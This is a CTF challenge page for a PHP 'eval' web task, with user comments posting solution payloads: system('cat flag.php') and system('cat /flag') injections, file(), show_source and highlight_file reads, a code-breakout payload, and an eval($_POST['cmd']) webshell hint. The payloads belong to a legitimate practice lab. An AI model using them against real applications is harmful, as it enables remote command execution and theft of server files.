evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 19206
提  示:
描  述:
eval
评论
syhaisy 1天前

GET /?hello=system('cat+flag.php') HTTP/1.1

回复 0

FTJJJ 6天前

?hello=eval(system('cat flag.php|grep {'))

回复 0

kitniu 27天前

file()是 " 的HTML 实体编码,是 PHP 内置的文件系统函数,核心功能是将整个文件按行读入一个字符串数组,每行(含换行符)为一个数组元素。 http://171.80.2.169:10115/?hello=file(%27flag.php%27)

回复 0

qth18700737704 1月前

?hello=eval(system(%27cat%20/flag%27))

回复 1

19153693078 1月前

根据代码php文件中包含flag.php 将传值hello得结果赋值给a,输出a得值,?hello=1 输出int 1,尝试将结果换成flag.php输出string(8) "flag.php",格式还是有问题的,考虑其是php文件,尝试?hello=file("flag.php"),得到文件中内容

回复 0

auroraSEA 1月前

?hello=show_source(%27flag.php%27)

回复 0

chm 3月前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 4月前

url/?hello=eval(system('cat /flag'))

回复 2

道法自然 4月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 4月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

WriteUp

image
harry

1 金币

评分(10)

解题动态

wtf1024 攻破了该题 7小时前
豆豆鱼雨雨雨雨雨雨 攻破了该题 10小时前
尧尧公主 攻破了该题 10小时前
13576364779 攻破了该题 11小时前
46963009 攻破了该题 11小时前
Tychema7 攻破了该题 13小时前
焱森 攻破了该题 16小时前
hadue 攻破了该题 19小时前
zyj132 攻破了该题 19小时前
1546546 攻破了该题 1天前
shengood 攻破了该题 1天前
syhaisy 攻破了该题 1天前
Grisha 攻破了该题 1天前
cxller 攻破了该题 1天前
awsdfsd 攻破了该题 1天前
rr5555 攻破了该题 2天前
3167107269 攻破了该题 2天前
司徒草青 攻破了该题 2天前
mybugku26 攻破了该题 2天前
星许 攻破了该题 3天前
问题反馈